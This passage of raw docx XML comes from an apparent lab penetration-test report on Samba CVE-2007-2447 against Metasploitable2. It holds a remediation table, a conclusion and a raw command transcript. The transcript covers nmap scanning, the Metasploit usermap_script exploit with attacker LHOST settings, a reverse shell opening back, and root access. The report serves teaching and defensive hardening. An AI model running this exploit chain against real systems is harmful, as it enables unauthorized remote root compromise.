            <w:tcW w:w="4200" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF" w:themeFill="background1"/>
            <w:tcMar>
              <w:top w:w="100" w:type="dxa"/>
              <w:left w:w="120" w:type="dxa"/>
              <w:bottom w:w="100" w:type="dxa"/>
              <w:right w:w="120" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p w14:paraId="2FFA4F9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Restrict SMB (TCP 139/445) to trusted network segments via firewall/ACL</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3550" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF" w:themeFill="background1"/>
            <w:tcMar>
              <w:top w:w="100" w:type="dxa"/>
              <w:left w:w="120" w:type="dxa"/>
              <w:bottom w:w="100" w:type="dxa"/>
              <w:right w:w="120" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p w14:paraId="30CBA43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Reduces exposure even if a service remains unpatched</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="003A2A16" w:rsidRPr="003A2A16" w14:paraId="47EB7C7A" w14:textId="77777777" w:rsidTr="003A2A16">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1600" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF" w:themeFill="background1"/>
            <w:tcMar>
              <w:top w:w="100" w:type="dxa"/>
              <w:left w:w="120" w:type="dxa"/>
              <w:bottom w:w="100" w:type="dxa"/>
              <w:right w:w="120" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p w14:paraId="02F5D24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High</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4200" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF" w:themeFill="background1"/>
            <w:tcMar>
              <w:top w:w="100" w:type="dxa"/>
              <w:left w:w="120" w:type="dxa"/>
              <w:bottom w:w="100" w:type="dxa"/>
              <w:right w:w="120" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p w14:paraId="2B904C00"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Enable and require SMB signing</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3550" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF" w:themeFill="background1"/>
            <w:tcMar>
              <w:top w:w="100" w:type="dxa"/>
              <w:left w:w="120" w:type="dxa"/>
              <w:bottom w:w="100" w:type="dxa"/>
              <w:right w:w="120" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p w14:paraId="59C078E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Prevents tampering and adds friction against SMB-layer abuse</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="003A2A16" w:rsidRPr="003A2A16" w14:paraId="0577EE92" w14:textId="77777777" w:rsidTr="003A2A16">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1600" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF" w:themeFill="background1"/>
            <w:tcMar>
              <w:top w:w="100" w:type="dxa"/>
              <w:left w:w="120" w:type="dxa"/>
              <w:bottom w:w="100" w:type="dxa"/>
              <w:right w:w="120" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p w14:paraId="30133B7F"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Medium</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4200" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF" w:themeFill="background1"/>
            <w:tcMar>
              <w:top w:w="100" w:type="dxa"/>
              <w:left w:w="120" w:type="dxa"/>
              <w:bottom w:w="100" w:type="dxa"/>
              <w:right w:w="120" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p w14:paraId="6CDE558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 xml:space="preserve">Run </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="003A2A16">
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
                <w:color w:val="000000" w:themeColor="text1"/>
              </w:rPr>
              <w:t>smbd</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="003A2A16">
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
                <w:color w:val="000000" w:themeColor="text1"/>
              </w:rPr>
              <w:t xml:space="preserve"> with least privilege where feasible (avoid unnecessary root context)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3550" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF" w:themeFill="background1"/>
            <w:tcMar>
              <w:top w:w="100" w:type="dxa"/>
              <w:left w:w="120" w:type="dxa"/>
              <w:bottom w:w="100" w:type="dxa"/>
              <w:right w:w="120" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p w14:paraId="2884B09B"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Limits blast radius of any future service compromise</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="003A2A16" w:rsidRPr="003A2A16" w14:paraId="13C8B175" w14:textId="77777777" w:rsidTr="003A2A16">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1600" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF" w:themeFill="background1"/>
            <w:tcMar>
              <w:top w:w="100" w:type="dxa"/>
              <w:left w:w="120" w:type="dxa"/>
              <w:bottom w:w="100" w:type="dxa"/>
              <w:right w:w="120" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p w14:paraId="65081CB8"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lastRenderedPageBreak/>
              <w:t>Medium</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4200" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF" w:themeFill="background1"/>
            <w:tcMar>
              <w:top w:w="100" w:type="dxa"/>
              <w:left w:w="120" w:type="dxa"/>
              <w:bottom w:w="100" w:type="dxa"/>
              <w:right w:w="120" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p w14:paraId="0342BC34"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Deploy network segmentation / host firewalls between file servers and the rest of the network</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3550" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF" w:themeFill="background1"/>
            <w:tcMar>
              <w:top w:w="100" w:type="dxa"/>
              <w:left w:w="120" w:type="dxa"/>
              <w:bottom w:w="100" w:type="dxa"/>
              <w:right w:w="120" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p w14:paraId="323AC5F2"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Limits lateral movement post-compromise</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="003A2A16" w:rsidRPr="003A2A16" w14:paraId="393D18CC" w14:textId="77777777" w:rsidTr="003A2A16">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1600" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF" w:themeFill="background1"/>
            <w:tcMar>
              <w:top w:w="100" w:type="dxa"/>
              <w:left w:w="120" w:type="dxa"/>
              <w:bottom w:w="100" w:type="dxa"/>
              <w:right w:w="120" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p w14:paraId="154C862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Medium</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4200" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF" w:themeFill="background1"/>
            <w:tcMar>
              <w:top w:w="100" w:type="dxa"/>
              <w:left w:w="120" w:type="dxa"/>
              <w:bottom w:w="100" w:type="dxa"/>
              <w:right w:w="120" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p w14:paraId="33C29BC5"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Implement continuous vulnerability scanning and patch cadence for exposed services</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3550" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF" w:themeFill="background1"/>
            <w:tcMar>
              <w:top w:w="100" w:type="dxa"/>
              <w:left w:w="120" w:type="dxa"/>
              <w:bottom w:w="100" w:type="dxa"/>
              <w:right w:w="120" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p w14:paraId="4BDEB11A"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Catches legacy/unpatched services proactively</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="003A2A16" w:rsidRPr="003A2A16" w14:paraId="43A933EB" w14:textId="77777777" w:rsidTr="003A2A16">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1600" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF" w:themeFill="background1"/>
            <w:tcMar>
              <w:top w:w="100" w:type="dxa"/>
              <w:left w:w="120" w:type="dxa"/>
              <w:bottom w:w="100" w:type="dxa"/>
              <w:right w:w="120" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p w14:paraId="77ED2897"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Low</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4200" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF" w:themeFill="background1"/>
            <w:tcMar>
              <w:top w:w="100" w:type="dxa"/>
              <w:left w:w="120" w:type="dxa"/>
              <w:bottom w:w="100" w:type="dxa"/>
              <w:right w:w="120" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p w14:paraId="603B2AEE"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 xml:space="preserve">Enable the detective controls in Section 9 (IDS signatures, </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="003A2A16">
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
                <w:color w:val="000000" w:themeColor="text1"/>
              </w:rPr>
              <w:t>auditd</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="003A2A16">
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
                <w:color w:val="000000" w:themeColor="text1"/>
              </w:rPr>
              <w:t>, egress monitoring)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3550" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF" w:themeFill="background1"/>
            <w:tcMar>
              <w:top w:w="100" w:type="dxa"/>
              <w:left w:w="120" w:type="dxa"/>
              <w:bottom w:w="100" w:type="dxa"/>
              <w:right w:w="120" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p w14:paraId="58EAD2E3" w14:textId="77777777" w:rsidR="003A2A16" w:rsidRPr="003A2A16" w:rsidRDefault="003A2A16" w:rsidP="003A2A16">
            <w:pPr>
              <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF" w:themeFill="background1"/>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
                <w:color w:val="000000" w:themeColor="text1"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="003A2A16">
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
                <w:color w:val="000000" w:themeColor="text1"/>
              </w:rPr>
              <w:t>Provides compensating detection while remediation is rolled out</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="4D3995F6"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t>11. Conclusion</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="353AE52B" w14:textId="723F5DE9" w:rsidR="003E187E"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This assessment demonstrates a textbook example of how an outdated, misconfigured Samba service can be leveraged for complete remote system compromise with minimal effort. The vulnerability exploited (CVE-2007-2447) is well documented and over a decade old, underscoring the importance of consistent patch management and service hardening. This exercise, performed against the intentionally vulnerable Metasploitable2 training platform in an isolated lab environment, illustrates the exploitation chain from initial discovery through to root access and serves as a practical reference for defensive hardening and detection engineering.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="54058154" w14:textId="2D78E893" w:rsidR="003A2A16" w:rsidRPr="003A2A16" w:rsidRDefault="003E187E" w:rsidP="003E187E">
      <w:pPr>
        <w:spacing w:after="160" w:line="278" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p w14:paraId="2F76848E" w14:textId="77777777" w:rsidR="003A2A16" w:rsidRPr="003A2A16" w:rsidRDefault="003A2A16" w:rsidP="003A2A16">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF" w:themeFill="background1"/>
        <w:spacing w:before="400" w:after="200"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="003A2A16">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>Appendix A: Raw Command Transcript</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="70C7FE92" w14:textId="77777777" w:rsidR="003A2A16" w:rsidRPr="003A2A16" w:rsidRDefault="003A2A16" w:rsidP="003A2A16">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF" w:themeFill="background1"/>
        <w:spacing w:after="160"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="003A2A16">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
        <w:t>Consolidated, chronological transcript of commands executed and key output observed during the assessment, reconstructed from the captured terminal sessions:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="437E0FB7" w14:textId="77777777" w:rsidR="003A2A16" w:rsidRPr="003A2A16" w:rsidRDefault="003A2A16" w:rsidP="003A2A16">
      <w:pPr>
        <w:pBdr>
          <w:top w:val="single" w:sz="4" w:space="4" w:color="444444"/>
          <w:left w:val="single" w:sz="4" w:space="4" w:color="444444"/>
          <w:bottom w:val="single" w:sz="4" w:space="4" w:color="444444"/>
          <w:right w:val="single" w:sz="4" w:space="4" w:color="444444"/>
        </w:pBdr>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF" w:themeFill="background1"/>
        <w:spacing w:before="100" w:after="200"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="003A2A16">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Consolas" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>$ ping 192.168.11.30</w:t>
      </w:r>
      <w:r w:rsidRPr="003A2A16">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Consolas" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:br/>
        <w:t xml:space="preserve">  -&gt; Destination Host Unreachable (not a live host)</w:t>
      </w:r>
      <w:r w:rsidRPr="003A2A16">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Consolas" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:br/>
        <w:t>$ ping 192.168.11.130</w:t>
      </w:r>
      <w:r w:rsidRPr="003A2A16">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Consolas" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:br/>
        <w:t xml:space="preserve">  -&gt; 4 packets transmitted, 4 received, 0% packet loss</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t xml:space="preserve">$ </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="003A2A16">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Consolas" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>nmap</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="003A2A16">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Consolas" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve"> -p 139,445 192.168.11.130</w:t>
      </w:r>
      <w:r w:rsidRPr="003A2A16">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Consolas" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:br/>
        <w:t xml:space="preserve">  -&gt; 139/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="003A2A16">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Consolas" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>tcp</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="003A2A16">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Consolas" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve"> open  </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="003A2A16">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Consolas" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>netbios-ssn</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="003A2A16">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Consolas" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:br/>
        <w:t xml:space="preserve">  -&gt; 445/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="003A2A16">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Consolas" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>tcp</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="003A2A16">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Consolas" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve"> open  </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="003A2A16">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Consolas" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>microsoft</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="003A2A16">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Consolas" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>-ds</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t xml:space="preserve">$ </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="003A2A16">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Consolas" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>msfconsole</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>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&gt; use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t>) &gt; set RHOSTS 192.168.11.130</w:t>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t>) &gt; run</w:t>
      </w:r>
      <w:r w:rsidRPr="003A2A16">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Consolas" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:br/>
        <w:t xml:space="preserve">  -&gt; SMB Detected (versions: 1); Host is running Unix</w:t>
      </w:r>
      <w:r w:rsidRPr="003A2A16">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Consolas" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:br/>
        <w:t xml:space="preserve">  -&gt; SMB signing is not required</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t>) &gt; search samba</w:t>
      </w:r>
      <w:r w:rsidRPr="003A2A16">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Consolas" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:br/>
        <w:t xml:space="preserve">  -&gt;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t xml:space="preserve">  (selected)</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auxiliary(scanner/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="003A2A16">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Consolas" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>smb</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="003A2A16">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Consolas" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="003A2A16">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Consolas" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>smb_version</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="003A2A16">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Consolas" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>) &gt; use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t>) &gt; set RHOSTS 192.168.11.130</w:t>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t>) &gt; set LHOST 192.168.11.129</w:t>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t>) &gt; set RPORT 139</w:t>
      </w:r>
      <w:r w:rsidRPr="003A2A16">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Consolas" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="003A2A16">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Consolas" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>msf</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="003A2A16">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Consolas" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve"> exploit(multi/samba/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="003A2A16">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Consolas" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>usermap_script</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="003A2A16">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Consolas" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>) &gt; exploit</w:t>
      </w:r>
      <w:r w:rsidRPr="003A2A16">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Consolas" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:br/>
        <w:t xml:space="preserve">  -&gt; [*] Started reverse TCP handler on 192.168.11.129:4444</w:t>
      </w:r>
      <w:r w:rsidRPr="003A2A16">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Consolas" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:br/>
        <w:t xml:space="preserve">  -&gt; [*] Command shell session 3 opened</w:t>
      </w:r>
      <w:r w:rsidRPr="003A2A16">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Consolas" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:br/>
        <w:t xml:space="preserve">       (192.168.11.129:4444 -&gt; 192.168.11.130:37650)</w:t>
      </w:r>
      <w:r w:rsidRPr="003A2A16">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Consolas" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:r w:rsidRPr="003A2A16">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Consolas" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:br/>
        <w:t xml:space="preserve">$ </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="003A2A16">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Consolas" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>whoami</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="003A2A16">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Consolas" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:br/>
        <w:t>root</w:t>
      </w:r>
      <w:r w:rsidRPr="003A2A16">
        <w:rPr>
